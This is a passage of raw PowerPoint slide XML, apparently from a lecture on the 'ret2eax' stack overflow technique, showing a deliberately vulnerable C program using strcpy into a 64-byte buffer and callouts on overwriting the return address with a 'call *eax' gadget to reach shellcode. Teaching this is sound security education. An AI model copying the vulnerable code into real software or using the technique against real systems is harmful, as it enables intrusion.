                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Calibri" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1093073" y="3577052"/>
            <a:ext cx="2161964" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>\x04\x85\x04\x08</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="556658" y="4634812"/>
            <a:ext cx="1710725" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" spc="-150" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AAAAAAAA</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" spc="-150" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="620953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17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="214452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ret2eax</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1089025" y="1463219"/>
            <a:ext cx="4473575" cy="4708981"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>msglog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>(char *input) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>    char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>[64];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, input);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> main(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>, char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>[]) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>    if(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> != 2) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>exploitme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>&gt;\n");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>        return -1; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>    }   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>msglog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0"/>
              <a:t>[1]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>    return 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rounded Rectangular Callout 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5334000" y="1295400"/>
            <a:ext cx="3048000" cy="1524000"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -107738"/>
              <a:gd name="adj2" fmla="val 17262"/>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800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>returns pointer to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rounded Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4953000" y="4648199"/>
            <a:ext cx="3733800" cy="18446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r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A subsequent </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>call *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>would redirect control to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="346966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ret2eax</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36866" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Calibri" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Calibri" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="36867" name="Picture 3" descr="ret2eax.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3970" y="1417638"/>
            <a:ext cx="3632200" cy="496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68" name="Picture 6" descr="Screen shot 2010-03-01 at 1.26.42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85326" y="1833238"/>
            <a:ext cx="473710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9" name="Rounded Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4106139" y="1833238"/>
            <a:ext cx="769937" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00">
              <a:alpha val="30196"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="20000" dir="5400000" rotWithShape="0">
              <a:srgbClr val="808080">
                <a:alpha val="37999"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Calibri" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="447324" y="3649518"/>
            <a:ext cx="3790044" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="50000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" spc="-150" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SHELLCODE ……………………...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" spc="-150" dirty="0">
              <a:solidFill>
                <a:srgbClr val="990000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1589416" y="1749245"/>
            <a:ext cx="1549153" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>call *%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="990000"/>
              </a:solidFill>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t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4348851" y="5458361"/>
            <a:ext cx="4473575" cy="1323439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>msglog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>(char *input) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>    char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>[64];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, input);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rounded Rectangular Callout 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5556712" y="2864584"/>
            <a:ext cx="3276600" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 14541"/>
              <a:gd name="adj2" fmla="val -115278"/>
              <a:gd name="adj3" fmla="val 16667"/>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Disassemble to find </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>call *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rounded Rectangular Callout 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5324929" y="4290159"/>
            <a:ext cx="3276600" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -124994"/>
              <a:gd name="adj2" fmla="val -239088"/>
              <a:gd name="adj3" fmla="val 16667"/>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Overwrite with address of call *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Freeform 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="453407" y="1995714"/>
            <a:ext cx="1106879" cy="3973286"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 1106879 w 1106879"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 3973286"/>
              <a:gd name="connsiteX1" fmla="*/ 164 w 1106879"/>
              <a:gd name="connsiteY1" fmla="*/ 2104572 h 3973286"/>
              <a:gd name="connsiteX2" fmla="*/ 1016164 w 1106879"/>
              <a:gd name="connsiteY2" fmla="*/ 3973286 h 3973286"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1106879" h="3973286">
                <a:moveTo>
                  <a:pt x="1106879" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="561081" y="721179"/>
                  <a:pt x="15283" y="1442358"/>
                  <a:pt x="164" y="2104572"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-14955" y="2766786"/>
                  <a:pt x="1016164" y="3973286"/>
                  <a:pt x="1016164" y="3973286"/>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42912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8" grpId="0" animBg="1"/>
      <p:bldP spid="9" grpId="0" animBg="1"/>
      <p:bldP spid="12"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4653022" y="1828703"/>
          <a:ext cx="2418868" cy="3723442"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                    <a:prstClr val="black">
                      <a:alpha val="40000"/>
                    </a:prstClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:tableStyleId>{D7AC3CCA-C797-4891-BE02-D94E43425B78}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2418868"/>
              </a:tblGrid>
              <a:tr h="723601">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rgbClr r="0" g="0" b="0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                    <a:gradFill flip="none" rotWithShape="1">
                      <a:gsLst>
                        <a:gs pos="0">
